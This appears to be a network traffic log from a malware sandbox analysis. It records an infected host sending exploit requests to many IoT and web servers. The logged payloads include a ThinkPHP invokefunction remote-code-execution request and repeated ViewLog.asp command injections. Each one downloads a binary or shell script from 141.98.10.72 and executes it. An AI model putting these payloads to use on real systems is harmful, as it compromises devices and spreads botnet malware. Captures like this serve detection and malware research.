                                                        Content-Length: 258
                                                        Expires: Wed, 14 Feb 2024 08:33:30 GMT
                                                        Date: Wed, 14 Feb 2024 08:33:30 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 65 37 39 66 33 36 31 37 26 23 34 36 3b 31 37 30 37 38 39 39 36 31 30 26 23 34 36 3b 32 61 61 66 33 32 33 30 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;e79f3617&#46;1707899610&#46;2aaf3230</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        281192.168.2.1449374119.201.85.10323
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:30.209184885 CET179INHTTP/1.0 200 OK
                                                        Server: Proxy
                                                        Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 37 3a 33 33 3a 33 33 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 49 6e 76 61 6c 69 64 20 75 73 65 72 2e 0d 0a 0d 0a 0d 0a
                                                        Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 17:33:33Auth Result: Invalid user.


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        282192.168.2.1460432112.216.224.9980
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:30.668287039 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        283192.168.2.1449378119.201.85.10323
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:30.775794983 CET179INHTTP/1.0 200 OK
                                                        Server: Proxy
                                                        Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 37 3a 33 33 3a 33 33 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 49 6e 76 61 6c 69 64 20 75 73 65 72 2e 0d 0a 0d 0a 0d 0a
                                                        Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 17:33:33Auth Result: Invalid user.


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        284192.168.2.1449386119.201.85.10323
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:31.339955091 CET179INHTTP/1.0 200 OK
                                                        Server: Proxy
                                                        Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 37 3a 33 33 3a 33 34 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 49 6e 76 61 6c 69 64 20 75 73 65 72 2e 0d 0a 0d 0a 0d 0a
                                                        Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 17:33:34Auth Result: Invalid user.


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        285192.168.2.1449400119.201.85.10323
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:31.913661003 CET179INHTTP/1.0 200 OK
                                                        Server: Proxy
                                                        Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 37 3a 33 33 3a 33 34 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 49 6e 76 61 6c 69 64 20 75 73 65 72 2e 0d 0a 0d 0a 0d 0a
                                                        Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 17:33:34Auth Result: Invalid user.


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        286192.168.2.143709294.236.193.1428080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:32.018414974 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:32.743940115 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:32.979564905 CET246INHTTP/1.1 302 Found
                                                        Location: /index.asp
                                                        Content-Length: 1759
                                                        Date: Sun, 20 Dec 2015 13:13:09 GMT
                                                        Server: eCos Embedded Web Server
                                                        Connection: close
                                                        Content-Type: text/html
                                                        Transfer-Encoding: chunked
                                                        Cache-Control: no-cache


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        287192.168.2.144222262.197.232.2188080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:32.018630028 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:33.223911047 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:33.480171919 CET109INHTTP/1.1 302 Found
                                                        Location: https://192.168.0.14:443/cgi-bin/ViewLog.asp
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        288192.168.2.143803095.140.142.2258080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:32.018810034 CET256OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68
                                                        Data Ascii: /bin/busybox wget h
                                                        Feb 14, 2024 09:33:32.743952036 CET256OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68
                                                        Data Ascii: /bin/busybox wget h
                                                        Feb 14, 2024 09:33:34.151920080 CET256OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68
                                                        Data Ascii: /bin/busybox wget h
                                                        Feb 14, 2024 09:33:36.999783039 CET256OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68
                                                        Data Ascii: /bin/busybox wget h
                                                        Feb 14, 2024 09:33:42.631530046 CET256OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68
                                                        Data Ascii: /bin/busybox wget h
                                                        Feb 14, 2024 09:33:53.895039082 CET256OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68
                                                        Data Ascii: /bin/busybox wget h
                                                        Feb 14, 2024 09:34:16.678226948 CET256OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68
                                                        Data Ascii: /bin/busybox wget h
                                                        Feb 14, 2024 09:35:01.732460976 CET256OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68
                                                        Data Ascii: /bin/busybox wget h


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        289192.168.2.145682294.123.62.2138080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:32.037564993 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        290192.168.2.144953694.123.182.1318080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:32.037688971 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        291192.168.2.144950031.200.60.1038080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:32.037775993 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        292192.168.2.145687294.122.199.498080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:32.039510965 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        293192.168.2.143837295.86.121.2208080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:32.043682098 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        294192.168.2.143614895.86.79.248080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:32.046403885 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        295192.168.2.143782894.46.22.1818080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:32.235344887 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:32.448905945 CET1286INHTTP/1.1 400 Bad Request
                                                        Date: Wed, 14 Feb 2024 08:33:32 GMT
                                                        Server: Apache
                                                        Accept-Ranges: bytes
                                                        Cache-Control: no-cache, no-store, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: 0
                                                        Connection: close
                                                        Content-Type: text/html
                                                        Data Raw: 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20
                                                        Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>400 Bad Request</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason {


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        296192.168.2.1439040112.162.247.11380
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:32.251342058 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:32.527540922 CET516INHTTP/1.0 400 Bad Request
                                                        Content-Type: text/html
                                                        Content-Length: 349
                                                        Connection: close
                                                        Date: Wed, 14 Feb 2024 08:33:32 GMT
                                                        Server: lighttpd/1.4.33
